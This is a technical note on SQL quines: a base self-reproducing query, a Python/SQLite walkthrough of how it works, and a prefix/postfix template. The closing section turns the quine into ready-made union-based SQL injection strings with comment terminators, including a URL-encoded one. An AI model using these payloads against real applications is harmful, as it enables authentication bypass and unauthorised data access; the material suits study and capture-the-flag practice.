Quine
A program that prints its own source code.
Quine SQL Query
SELECT REPLACE(REPLACE('SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS Quine',CHAR(34),CHAR(39)),CHAR(36),'SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS Quine') AS Quine;
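How the query above reproduces itself, as an added example that is not part of the original post: the two nested REPLACE calls are mirrored in Python, and the resulting statement is then run in an in-memory SQLite database. SQLite is an assumption here, chosen because it ships with Python and provides REPLACE and CHAR; the helper names trace, run and is_quine are made up for this example.

```python
import sqlite3

# Inner literal of the page's base quine. "$" (CHAR(36)) is the slot the
# literal is copied into; '"' (CHAR(34)) stands in for "'" (CHAR(39)).
TEMPLATE = 'SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS Quine'


def trace(template, stand_in='"', real="'"):
    """Mirror the two nested REPLACE calls and return both intermediate strings."""
    swapped = template.replace(stand_in, real)   # inner REPLACE: quote swap
    filled = swapped.replace("$", template)      # outer REPLACE: fill the slot
    return swapped, filled


def run(statement):
    """Execute the statement in an in-memory SQLite database, return its one cell."""
    con = sqlite3.connect(":memory:")
    try:
        return con.execute(statement).fetchone()[0]
    finally:
        con.close()


def is_quine(statement):
    """True only if the returned text is exactly the statement that was sent."""
    return run(statement) == statement


# The text the template expands to is the text the database should return.
STATEMENT = trace(TEMPLATE)[1]

if __name__ == "__main__":
    swapped, filled = trace(TEMPLATE)
    print("after quote swap:", swapped)
    print("after slot fill :", filled)
    print("database agrees :", run(STATEMENT) == filled)
    # The page's query ends in ';', which the literal does not contain,
    # so the output equals the statement without its terminator.
    print("with ';'        :", is_quine(STATEMENT + ";"))
    # Constructed broken variant: wrong slot character code, no longer a quine.
    print("CHAR(35) variant:", is_quine(STATEMENT.replace("CHAR(36)", "CHAR(35)")))
```

The output matches the statement only without the trailing `;`, because the terminator is not part of the string literal.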
Additional clauses can be inserted at the prefix and postfix positions.
# single quotation
[prefix] select replace(replace('[prefix] select replace(replace("$",char(34),char(39)),char(36),"$") [postfix]',char(34),char(39)),char(36),'[prefix] select replace(replace("$",char(34),char(39)),char(36),"$") [postfix]') [postfix]
# double quotation
[prefix] select replace(replace("[prefix] select replace(replace('$',char(39),char(34)),char(36),'$') [postfix]",char(39),char(34)),char(36),"[prefix] select replace(replace('$',char(39),char(34)),char(36),'$') [postfix]") [postfix]
When a single quotation mark is needed, use ' only in the first prefix; every later occurrence must use a double quotation mark instead.
# single quotation
prefix : a' union
postfix : as quine-- -
a' union select replace(replace('a" union select replace(replace("$",char(34),char(39)),char(36),"$") as quine-- -',char(34),char(39)),char(36),'a" union select replace(replace("$",char(34),char(39)),char(36),"$") as quine-- -') as quine-- -
prefix : a' union
postfix : as quine# (the # is written URL-encoded as %23 in the query below)
a' union select replace(replace('a" union select replace(replace("$",char(34),char(39)),char(36),"$") as quine%23',char(34),char(39)),char(36),'a" union select replace(replace("$",char(34),char(39)),char(36),"$") as quine%23') as quine%23
# double quotation
prefix : a" union
postfix : as quine-- -
a" union select replace(replace("a' union select replace(replace('$',char(39),char(34)),char(36),'$') as quine-- -",char(39),char(34)),char(36),"a' union select replace(replace('$',char(39),char(34)),char(36),'$') as quine-- -") as quine-- -